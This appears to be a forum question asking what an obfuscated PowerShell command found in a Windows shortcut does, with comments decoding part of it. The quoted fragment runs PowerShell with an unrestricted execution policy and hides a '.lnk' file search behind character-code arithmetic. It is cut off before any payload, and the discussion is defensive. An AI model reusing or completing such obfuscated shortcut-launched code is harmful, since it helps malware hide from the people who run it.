# What does this powershell command do?

Tags: windows, powershell, shell, command-line, deobfuscation

I came across this string embedded within a Windows shortcut. I'm under the impression that this may be malicious or adversarial in nature.

I do not have any knowledge with PowerShell, could anyone perhaps decipher this incantation, or point me to related resources?

```
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted function QC($wHV) {$Z = $Null;$rzh = @(2037,2099,2101,2098);$IQH = $Null;$BEwI = 1991;foreach($bAZJ in $rzh){$IQH += [Char]($bAZJ-$BEwI)};Get-ChildItem $wHV -Recurse -Dept
```

I wholeheartedly thank you for your time.

Comment: I would say it is suspicious because it uses several levels of obfuscation to hide its purpose/intent.

Comment: @Bill_Stewart I believe the author of this string may have intended for others to unknowingly execute this. Are you perhaps able to understand its function?

Comment: It is likely the command string is longer than is allowed to be pasted on this site (it appears to be truncated at the right-most end). The code obfuscates its purpose, so I wouldn't run it.

Comment: Definitely sketchy...fwiw, the numbers and casting to char give ".lnk"

Comment: Thank you all very much for your feedback. I think I may have an understanding as to how this works now. It seems to further involve the .lnk shortcut file. I will try to investigate further into this.

Comment: The code does nothing else than opening a PS session, defining a broken function and terminate. The function is never called. But as @Bill_Stewart already pointed out, the code seems to be truncated. If you did not post all the code, it still might contain harmful parts.